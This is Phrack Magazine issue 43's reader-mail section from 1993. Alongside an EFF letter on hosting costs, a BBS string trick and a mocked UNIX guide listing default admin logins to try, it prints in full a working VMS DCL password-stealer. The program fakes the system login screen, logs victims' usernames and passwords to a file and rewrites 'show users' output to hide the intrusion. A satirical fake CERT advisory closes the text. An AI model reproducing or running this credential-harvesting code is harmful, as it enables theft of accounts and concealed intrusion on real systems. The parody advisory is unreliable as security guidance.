File size: 37,008 Bytes
8ecd256
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 2 of 27

                                Phrack Loopback
                                    Part I

****************************************************************************

                               COMING NEXT ISSUE

                         Van Eck Info (Theory & Practice)
   More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
      HUGE University Dialup List  (Mail Us YOUR School's Dialup NOW!)
                          Neato Plans For Evil Devices
                               Gail Thackeray Gifs

*********************************** M A I L *********************************

Chris,

Craig Neidorf gave me these addresses as ways to reach you.  He tells me
that you are currently editing Phrack.  I hope you are well.

Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
IUP connection, was charging us an extra $1,000 per month.  They did some
investigation at my request.  We determined that Phrack traffic alone was
responsible for over 40% of the total bytes transferred from the site over
the past year or so.  This is several gigabytes per month.  All in all, the
CuD archive, which contains Phrack, CuD, and other publications accounts
for 85% of our total traffic.  All of the email to and from EFF, Usenet
traffic, and other FTP (from the EFF archive, the CAF archive, and others)
constitutes about 15%.

EFF isn't going to be able to carry it any more because it is effectively
costing us $1,000 per month.  The fundamental problem is that Phrack is so
popular (at least as a free good) to cause real expense in transmission
costs.  Ultimately the users are going to have to pay the costs because
bandwidth (when measures in gigabytes anyway) isn't free.   The 12K per
year it costs us to carry Phrack is not something which EFF can justify in
its budget.  I'm sure you can understand this.

On July 1, eff.org moves from Cambridge to Washington, DC which is when I
expect we will stop carrying it.  I wanted to raise this issue now to let
you know in advance of this happening.

I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
maintains the archive, to see whether there is anything we can do to help
find another site for Phrack or make any other arrangement which will
result in less loss of service.

Mitch



------------------------------------------------------------------------------
                Mitchell Kapor, Electronic Frontier Foundation
     Note permanent new email address for all correspondence as of 6/1/93
                              mkapor@kei.com


[Editor:  Well, all things must come to an end.  Looks like EFF's
          move to Washington is leaving behind lots of bad
          memories, and looking forward to a happy life in the hotbed
          of American politics.  We wish them good luck.  We also
          encourage everyone to join.........CPSR.

          In all fairness, I did ask Mitch more detail about the
          specifics of the cost, and he explained that EFF was paying
          flat rate for a fractional T-1, and whenever they went over
          their allotted bandwidth, they were billed above and beyond
          the flat rate.  Oh well.  Thank GOD for Len Rose.
          Phrack now has a new home at ftp.netsys.com.]

****************************************************************************

  I'm having a really hard time finding a lead to the Information
America Network.  I am writing you guys as a last resort.  Could
you point me in the right direction?  Maybe an access number or
something?  Thanks you very much.

[Editor:  You can reach Information America voice at 404-892-1800.
          They will be more than happy to send you loads of info.]

****************************************************************************

 To whom it may concern:
This is a submission to the next issue of phrack...thanks for the great
'zine!
----------------------------cut here-------------------------------
Greetings Furds:

 Have you ever wanted to impress one of those BBS-babes with your astounding
knowledge of board tricks?  Well *NOW* you can!  Be the life of the party!
Gain and influence friends!  Irritate SysOps!  Attain the worship and
admiration of your online pals.  Searchlight BBS systems (like many other
software packages) have internal strings to display user information in
messages/posts and the like.  They are as follows (tested on Searchlight BBS
System v2.25D):

        \%A  =  displays user's access level
        \%B  =  displays baud rate connected at
        \%C  =  unknown
        \%F  =  unknown
        \%G  =  displays graphics status
        \%K  =  displays user's first name
        \%L  =  displays system time
        \%M  =  displays user's time left on system
        \%N  =  displays user's name in format: First Last
        \%O  =  times left to call "today"
        \%P  =  unknown
        \%S  =  displays line/node number and BBS name
        \%T  =  displays user's time limit
        \%U  =  displays user's name in format: FIRST_LAST

All you gotta do is slam the string somewhere in the middle of a post or
something and the value will be inserted for the reader to see.

 Example:  Hey there chump, I mean \%K, you better you better UL or log
           off of \%S...you leach too damn many files..you got \%M mins
           left to upload some new porn GIFs or face bodily harm and
           mutilation!.

                      ----------------------------

Have phun!
Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS


[Editor:  Ya know, once a LONG LONG time ago, I got on a BBS and
          while reading messages noticed that a large amount of
          messages seemed to be directed at ME!!#  It took me
          about 10 minutes to figure it out, but BOY WAS I MAD!

          Then I added my own \%U message for the next hapless fool.
          :)  BIG FUN!]

****************************************************************************

-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-

                                 SotMESC

                   The US SotMESC Chapter is offering
                 Scholarships for the 1993 school term.

              Entries should be single-spaced paragraphs,
                  Double-spacing between paragraphs.

               The subject should center on an aspect of the
            Computer Culture and be between 20-30 pages long.

                           Send entries to:

                               SotMESC
                              PO Box 573
                         Long Beach, MS 39560

    All entries submitted will become the property of the SotMESC

-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

****************************************************************************

           The Southwest Netrunner's League's
-----------------------------------------------------------------
  WareZ RoDeNtZ Guide to UNIX!!!!
-----------------------------------------------------------------

 Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
 Assists  by:SysCon XIV       (The Ma'Bell Rapist)
      Iron Man MK 4a   (Things that make ya go boom)

 This file begs to be folded, spindeled,and mutilated.
 No Rights Reserved@1993

-----------------------------------------------------------------

  Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu

  Coming this September.... Shadowland, 68020... Watch this space.
-----------------------------------------------------------------

Part I(Basic commands)

Phile Commands: ls=List Philes
  more,page=Display Phile on Yo Terminal
  cp=Copy Phile
  mv=Move or Remove Philes
  rm=Remove Philes

Editor Commnds: vi=Screen Editor

Dirtory cmmnds: dir=Prints Directory
  mkdir=Makes a new Directory(also a VERY bad bug)
  rmdir=Remove a Directory
  pwd=print working directory

Misc. Commands: apropos=Locate commands by keyword lookup.
  whatis=Display command description.
  man=Displays manual pages online.
  cal=Prints calendar
  date=Prints the time and date.
  who=Prints out every one who is logged in
      (Well, almost everyone 7:^]  )

---------------------------------------------------------------

Part II(Security(UNIX security, another OXYMORON  7:^]  ))

If you are a useless wAReZ r0dEnT who wants to try to Netrun
a UNIX system, try these logins....

 root
 unmountsys
 setup
 makefsys
 sysadm
 powerdown
 mountfsys
 checkfsys


All I can help ya with on da passwords iz ta give you some
simple guidelines on how they are put together....

 6-8 characters
 6-8 characters
 1 character is a special character (exmpl:# ! ' & *)

-----------------------------------------------------------------

Well thats all fo' now tune in next time, same Hack-time
       same Hack-channel!!!


 THE TECHNOMANCER           I have taken all knowledge
   af604@FreeNet.hsc.colorado.edu
                                   to be my province

--
Technomancer
Southwest Netrunner's League

*****************************************************************

[Editor:  This is an example of what NOT to send to Phrack.
          This is probably the worst piece of garbage I've
          received, so I had to print it.  I can only hope
          that it's a private joke that I just don't get.

          Uh, please don't try to write something worse and
          submit it hoping to have it singled out as the
          next "worst," since I'll just ignore it.]

****************************************************************************

Dear Phrack,
   I was looking through Phrack 42 and noticed the letters about password
stealers. It just so happened that the same day I had gotten extremely
busted for a program which was infinitely more indetectible. Such is life.
I got off pretty well being an innocent looking female so it's no biggie.
Anyway, I deleted the program the same day because all I could think was
"Shit, I'm fucked". I rewrote a new and improved version, and decided to
submit it. The basic advantages of this decoy are that a) there is no
login failure before the user enters his or her account, and b) the
program defines the show users command for the user so that when they
do show users, the fact that they are running out of another account
doesn't register on their screen.
   There are a couple holes in this program that you should probably be
aware of. Neither of these can kick the user back into the account that
the program is running from, so that's no problem, but the program can
still be detected. (So basically, don't run it out of your own account...
except for maybe once...to get a new account to run it out of) First, once
the user has logged into their account (out of your program of course) hitting
control_y twice in a row will cause the terminal to inquire if they are
doing this to terminate the session on the remote node. Oops. It's really no
problem though, because most users wouldn't even know what this meant. The
other problem is that, if the user for some strange reason redefines show:

$show == ""

then the show users screen will no longer eliminate the fact that the account
is set host out of another. That's not a big deal either, however, because
not many people would sit around randomly deciding to redefine show.
   The reason I was caught was that I (not even knowing the word "hacker"
until about a month ago) was dumb enough to let all my friends know about the
program and how it worked. The word got spread to redefine show, and that's
what happened. The decoy was caught and traced to me. Enough BS...here's the
program. Sorry...no UNIX...just VMS.
                                            Lady Shade

I wrote the code...but I got so many ideas from my buddies:
Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice

------------------------------------------------

$if p1 .eqs. "SHOW" then goto show
$sfile = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The role of the dummy file in this program is to tell if the program !!!!
!!!! is being used as a decoy or as a substitute login for the victim. It !!!!
!!!! does not stay in your directory after program termination.           !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
$if sfile .nes. "" then goto other
$open/write io user.dat
$close io
$open/write dummy instaar_device:[miller_g]dummy.txt
$close dummy
$wo == "write sys$output"
$line = ""
$user = ""
$pass = ""
$a$ = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! A login screen with a message informing someone of new mail wouldnt !!!!
!!!! be too cool...                                                      !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$set broadcast=nomail
$set message/noidenficitaion/noseverity/nofacility/notext
$on error then goto outer
$!on control_y then goto inner
$wo " [H [2J"
$wo ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! insert a fake logout screen here !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$wo "   ZJABAD_X     logged out at ", f$time()
$wo " [2A"
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the main body of the program. It simulates the system login !!!!
!!!! screen. It also grabs the username and password and sticks them in  !!!!
!!!! a file called user.dat                                              !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$outer:
$set term/noecho
$inquire a$/nopun ""
$inquire a$/nopun ""
$set term/echo
$c = 0
$c1 = 0
$c2 = 0
$inner:
$c2 = c2 + 1
$if c2 .eqs. 5 then goto speedup
$c = c + 1
$if c .eqs. 15 then goto fail
$if c1 .eqs. 3 then goto fail3
$user = "a"
$wo "Username: "
$from_speedup:
$set term/uppercase
$wo " [2A"
$read/time_out=10/prompt=" [9C " sys$command user
$if user .eqs. "a" then goto timeout
$set term/nouppercase
$if user .eqs. "" then goto inner
$set term/noecho
$inquire pass "Password"
$set term/echo
$if user .eqs. "ME" then goto done
$if pass .eqs. "" then goto fail
$open/append io user.dat
$write io user + " " + pass
$close io
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Sends the user into their account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$open/write io set.com
$write io "$set host 0"
$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
$write io pass
$close io
$@set
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control has been returned to your account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$write io " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Simulates a failure if the password is null, and also if the !!!!
!!!! username prompt has cycled through 15 times... This is what  !!!!
!!!! the system login screen does.                                !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail:
$c = 1
$c1 = c1 + 1
$wo "User authorization failure"
$wo " [1A"
$goto inner
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! After the third failure, the system usually sends the screen back !!!!
!!!! one step...this just handles that.                                !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail3:
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The system keeps a timeout check in the login. If a username is not !!!!
!!!! entered quickly enough, the timeout message is activated            !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$timeout:
$set term/nouppercase
$wo "Error reading command input"
$wo "Timeout period expired"
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! There is a feature in this program which sets the terminal to        !!!!
!!!! uppercase for the input of a username. This is wonderful for         !!!!
!!!! preventing program detection, but it does cause a problem. It slows  !!!!
!!!! the screen down, which looks suspicious. So, in the case where a     !!!!
!!!! user walks up tot he terminal and holds the return key down for a    !!!!
!!!! bit before typing in their username, this section speeds up the run  !!!!
!!!! considerably.                                                        !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$speedup:
$set term/nouppercase
$fast_loop:
$user = "a"
$read/time_out=1/prompt="Username: " sys$command io
$if user .eqs. "a" then goto from_speedup
$goto fast_loop
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is optional. There are many ways that you can implement !!!!
!!!! to break out of the program when you think you have gotten enough    !!!!
!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
!!!! for the username and pass which kicks you out. If this option is     !!!!
!!!! implemented, you should at least put in something that looks like    !!!!
!!!! you have just logged in, the program should not kick straight back   !!!!
!!!! to your command level, but rather execute your login.com. 2) You     !!!!
!!!! can log in to the account which is stealing the password from a      !!!!
!!!! different terminal and stop the process on the account which is      !!!!
!!!! running the program. This is much safer, and my recommandation.      !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$done:
$set broadcast=mail
$set message/facility/text/identification/severity
$delete dummy.txt;*
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is how one covers up the fact that the account which has !!!!
!!!! been stolen is running out of another. Basically, the area of the show!!!!
!!!! users screen which registers this is at the far right hand side.      !!!!
!!!! This section first writes the show users data to a file and alters    !!!!
!!!! it before it is written to the screen for viewing by the user. There  !!!!
!!!! may exist many forms of the show users command in your system, and    !!!!
!!!! you may have to handle each one differently. I have written only two  !!!!
!!!! manipulations into this code to be used as an example. But looking    !!!!
!!!! at how this is preformed should be enough to allow you to write your  !!!!
!!!! own special cases. Notice that what happens to activate this section  !!!!
!!!! of the program is the computer detects the word "show" and interprets !!!!
!!!! it as a procedure call. The words following show become variables     !!!!
!!!! passed into the program as p1, p2, etc. in the order which they       !!!!
!!!! were typed after the word show. Also, by incorporating a third data   !!!!
!!!! file into the manipulations, one can extract the terminal id for the  !!!!
!!!! account which the program is running out of and plug this into the    !!!!
!!!! place where the user's line displays his or her terminal id. Doing    !!!!
!!!! this is better that putting in a fake terminal id, but that is just a !!!!
!!!! minor detail.                                                         !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$show:
$show = ""
$show$ = ""
$length = 0
$ch = ""
$full = 0
$c = 0
$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
$if p3 .eqs. "" then goto fallout
$goto full
$fallout:
$show 'p2' 'p3'
$exit
$ufull:
$show users/full/output=users.dat
$goto manipulate
$full:
$show$ = p3 + "/output=users.dat"
$show users 'show$'
$manipulate:
$set message/nofacility/noseverity/notext/noidentification
$open/read io1 users.dat
$open/write io2 users2.dat
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control_y must be dealt with here. If the user did happen to controlY !!!
!!!! there is a chance that the files users.dat and users2.dat could be    !!!
!!!! left in their directory. That is a bad thing as we are trying to      !!!
!!!! prevent detection :)                                                  !!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$on control_y then goto aborted
$user = ""
$test = ""
$long = ""
$ch = ""
$length = 0
$user = f$user()
$length = f$length(user) - 2
$user = f$extract(1,length,user)
$read_loop:
$read/end_of_file=eof io1 line
$test = f$extract(1,length,line)
$ch = f$extract (length+1,1,line)
$if (test .eqs. user) .and. (ch .eqs. " ") then goto change
$from_change:
$write io2 line
$goto read_loop
$eof:
$close io1
$close io2
$type users2.dat
$del users.dat;*
$del users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
$change:
$if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"
$goto from_change
$aborted:
$!if f$search("users.dat") .nes. "" then close io1
$!if f$search("users.dat") .nes. "" then delete users.dat;*
$!if f$search("users2.dat") .nes. "" then close io2
$!if f$search("users2.dat") .nes. "" then delete users2.dat;*
$close io1
$close io2
$delete users.dat;*
$delete users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the section of the program which is executed in place of the !!!!
!!!! users login.com. It does grab their login and execute it to prevent  !!!!
!!!! suspicion, but there are a couple of hidden commands which are also  !!!!
!!!! added. They redefine the show and sys commands so that the user can  !!!!
!!!! not detect that he or she is riding off of another account.          !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$other:
$sh$ = "@instaar_device:[miller_g]findnext show"
$shline = "$sh*ow ==" + sh$
$logi = ""
$logi = f$search("login.com")
$if logi .NES. "" then goto Ylogin
$nologin:
$open/write io login2.com
$write io shline
$close io
$@login2
$delete login2.com;*
$exit
$ylogin:
$open/write io2 login2.com
$open/read io1 login.com
$transfer_loop:
$read/end_of_file=ready io1 line
$write io2 line
$goto transfer_loop
$ready:
$write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""
$close io1
$close io2
$@login2
$delete login2.com;*
$exit


[Editor:  Thanks for the letter and program.  I wish I could bring
          myself to use a VMS and try it out.  :)  Always happy
          to get notice that somewhere out there a female reads
          Phrack.  By the way, "innocent female" is an oxymoron.]

****************************************************************************

To:   Phrack Loopback.
From: White Crocodile.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports"  is
 really cool invention and I (sorry for egoisthic "I") with  pleasure
 wasting time for his reading ( ex. my playboy time ). But  here  for
 some unknown reason appear equal  style,  and  all  loopback  remind
 something medium between "relations search" [Hello Dear Phrack, I am
 security expert of our local area, but when I looked  to  output  of
 "last" program (oh,yeah - "last" it is ...), I ocassionaly  under  -
 standed  what apparently someone elite  hacker  penetrated  into  my
 unpassworded  account!  But  how  he  knew  it???  I  need  to  talk
 with him! Please mail me at security@...] and "make yourself" [Yep.I
 totally wrote program which gets file listing from target  vicitim's
 home directory in current host. After that I decided  to  contribute
 it for You. I hope this will help. Here is the complete C code. "rx"
 permission in target's '$HOME' required.].
  Looking similar articles like "... off Geek!" and  various  reports
 which don't reacheds PWN. [CENSORED BY ME].
  Resulting from abovewritten reason and I let  myself  to  add  some
 elite (oops word too complex), some bogus and little deposit to Your
 lb. He written in classic plagiarize style.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                             *  *  *
Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what
it is horrible (don't read it please - this message to Bart),  but  I
doing it all the time (today already 3 month). I have not much time to
write, and here is the subject - I broke into  one  military  computer
and stole their mail about new security bug!!! l00k f3r |t:

                                - - -
          DDN & CERT
                            SPECIAL REPORT*
          Sun 3.x,4.1.x login flaw

Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX
                                       and many yet unknown systems)

Impact: Allow random intruders to gain "root" access.

Description:
   The huge security hole was there and waiting! Type:

     $ login root

   [ no option required ], and You are! All what You need to know its
   just root's password, but it (pw), sure, can be easily obtained from
   real root, by asking him (root). Ex - "$ talk root"

Possible fix until copyrighted patch come out:

     #rm /usr/bin/login
     #cp /usr/games/fortune /usr/bin/login

If you believe that your system has been compromised, contact CERT CC. Call
our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in  time
of "Silence of the Lamb"), leave Inet address of your system and  number of
private credit card.
                               - - -

* Report not will be printed in cert advisories in this form, becouse FBI
   need remove all hints and tips, and make him useless to intruders.

DISCLAIMER: Above document written by CERT, DDN and FBI -
                                      all pretension to them.

Thanks to gr*k (I can't write his full name for security reasons),roxtar,
